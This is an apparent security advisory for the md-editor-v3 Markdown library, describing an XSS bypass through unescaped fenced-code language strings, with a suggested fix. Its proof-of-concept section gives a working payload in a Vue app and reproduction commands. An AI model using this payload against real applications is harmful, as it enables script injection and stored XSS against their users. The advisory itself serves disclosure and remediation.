GHSA-3rm2-h79c-8qw6
md-editor-v3: XSS via fenced-code language rendering bypass
Quick fix
GHSA-3rm2-h79c-8qw6 — md-editor-v3: upgrade to the fixed version with the command below.
npm install md-editor-v3@6.5.4Details
### Summary `MdPreview` interpolates a fenced-code language into HTML attributes without escaping it. A crafted info string therefore executes JavaScript even when the shipped `XSSPlugin` is enabled.
### Details `useMarkdownIt()` (`packages/MdEditor/layouts/Content/composition/useMarkdownIt.ts:206`) registers a `highlight` callback whose final return inserts `language` into both `class="language-${language}"` and an unquoted `language=${language}` attribute without escaping. Both highlighting paths reach this return. `XSSPlugin()` filters only existing `html_block` and `html_inline` tokens before rendering, so it cannot inspect this renderer-generated HTML.
### PoC The Vue application enables the shipped `XSSPlugin` and renders attacker-controlled Markdown. `noHighlight: true` only makes reproduction deterministic; the default highlighting path reaches the same unsafe return. Use this as `src/main.js`:
```js import { createApp, h } from 'vue'; import { MdPreview, XSSPlugin, config } from 'md-editor-v3';
config({ markdownItPlugins: p => [...p, { type: 'xss', plugin: XSSPlugin, options: {} }] }); const markdown = '```x"><details/open/ontoggle=alert(document.domain)>\nSAFE\n```'; createApp({ render: () => h(MdPreview, { editorId: 'poc', modelValue: markdown, noHighlight: true }) }).mount('#app'); ```
Create and run the app, replacing `src/main.js` when indicated:
```sh npm create vite@latest poc -- --template vue cd poc npm install npm install md-editor-v3@6.5.3 # Replace src/main.js with the code above. npm run dev ```
Opening the displayed URL automatically shows the application hostname in an alert.
### Impact An attacker who can supply Markdown can execute JavaScript in the application origin when a victim renders it. If the host stores that Markdown, this becomes stored XSS.
### Suggested fix Escape `language` with `md.utils.escapeHtml` before interpolation and quote the `language` attribute. Add this payload and the raw control as regression tests with `XSSPlugin` enabled.
Are you affected?
Enter the version of the package you're using.